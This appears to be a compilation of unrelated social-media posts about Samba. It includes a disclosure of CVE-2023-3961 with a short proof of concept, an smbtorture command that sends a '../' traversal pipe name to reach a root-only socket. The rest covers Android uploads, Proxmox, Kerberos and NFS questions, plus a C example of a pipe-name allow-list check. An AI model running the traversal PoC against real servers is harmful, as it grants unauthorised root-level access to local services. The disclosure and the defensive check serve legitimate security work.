Interesting #samba smbd #vulnerability CVE-2023-3961 allows a Samba client to connect to any server-side unix domain socket. The access occurs as the root user and thus any named unix domain socket is fully accessible. If a suitable service exists on the server, this will lead to unauthorized access to the service, assuming the socket file access rights are the only means of authorization. The impact depends entirely on the available services on the server, but may lead to #privilegeescalation or similar high-severity impacts.
Updated to add: This vulnerability is made more difficult to exploit since the attacker has somewhat limited control over the data being sent to the socket.
CVE-2023-3961: #smbd allows client access to unix domain sockets on the file system
A client sending a pipe name containing unix directory traversal characters (../) could cause #Samba to connect to arbitrary unix domain sockets as root.
How do you get an #Android to upload files, primarily pictures and videos, to a #Samba share? I would have expected something like that under "Share" in the gallery, but apparently that is not a supported feature...
Does anyone have an idea how to do this?
It is generally about #Backup and network access to the data.
I am grateful for any hint.
This post is really a small collection of thoughts about Proxmox when used in a home lab situation and home labs in general. I was originally going to post this to Mastodon only but it didn't fit in a single post.
A lot of people (at least what I see on reddit) build Proxmox systems with shared file systems like ceph, even for home lab use.
Here is a Proof of Concept demonstrating the #samba smbd CVE-2023-3961 #vulnerability
On the victim host running vulnerable Samba, set up a unix domain socket only accessible as the root user:
$ sudo socat UNIX-LISTEN:/pwned,mode=700,fork stdout
On the attacking host:
$ smbtorture -U "" -N ncacn_np:victimhost[/pipe/../../../../../pwned] rpc.echo
At least a stock Debian install of Samba allows anonymous exploitation in this manner. This is quite alarming, to say the least.
Note: smbtorture is built as part of the Samba build procedure. On Debian-based systems you can use sudo apt build-dep samba && apt source samba && cd samba-* && dpkg-buildpackage to get it. Specify LD_LIBRARY_PATH as needed to make it find the necessary shared objects.
smbtorture will talk the MS-RPC protocol to the unix domain socket, and as such is not directly useful as a generic #exploitation tool. #Weaponizing the vulnerability is left as an exercise for the reader.
Addendum: You can't fully control the data being sent to the socket. This will likely neuter most attack scenarios.
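Added example (not part of the posts above and not Samba's own code): a sketch of the server-side check whose absence the advisory describes, comparing an unchecked join of a client-supplied pipe name with an allow-list that accepts a single path component only. The directory NP_DIR, the function names and the 64-byte limit are assumptions made for this illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical socket directory for this example; not Samba's real path. */
#define NP_DIR "/run/example/np"

/* Unchecked join: the client-chosen name goes straight into the path,
 * so "../" components walk out of NP_DIR once the kernel resolves it. */
int np_path_unchecked(const char *name, char *out, size_t len)
{
    int n = snprintf(out, len, "%s/%s", NP_DIR, name);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Allow-list check: one path component, [A-Za-z0-9_.-] only.
 * Returns 1 if the name may be used, 0 otherwise. */
int np_name_ok(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > 64 || !strcmp(name, ".") || !strcmp(name, ".."))
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;   /* rejects '/', '\\' and anything unexpected */
    }
    return 1;
}

/* Checked join: refuse before any path is built or connect() is called. */
int np_path_checked(const char *name, char *out, size_t len)
{
    if (!np_name_ok(name))
        return -1;
    return np_path_unchecked(name, out, len);
}

int main(void)
{
    char path[256];
    const char *names[] = { "lsarpc", "../../../../../pwned", "..", "a/b" }; /* constructed */
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++)
        printf("%-22s -> %s\n", names[i],
               np_path_checked(names[i], path, sizeof(path)) == 0 ? path : "rejected");
    return 0;
}
```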
Samba: New versions fix several security vulnerabilities
Due to various programming errors, attackers could access secret information, up to and including the Kerberos TGT password. Updates are available.
Hm, under Debian 11 (smbclient from samba 4.13.13) this works
(with KRB5CCNAME=FILE:/tmp/krb5cc_nslcd):
smbclient -N --use-kerberos=required -gL <server>
Under Debian 12 (smbclient from samba 4.17.9) it no longer does.
Am I doing something wrong, or was a bug introduced in #Samba or the corresponding Debian package?
If I use NFSv3, then all my shares are full of #AppleDouble files (i.e., with the "._" prefix).
If I use #NFSv4, then "git fetch" just hangs forever and never finishes.
If I use #Samba, then either 1) everything is 755 but I cannot delete files xD or 2) (after applying https://askubuntu.com/a/1126633/413683) the permissions are correct, but something is wrong with my .git: ad_convert: Failed to convert [.git].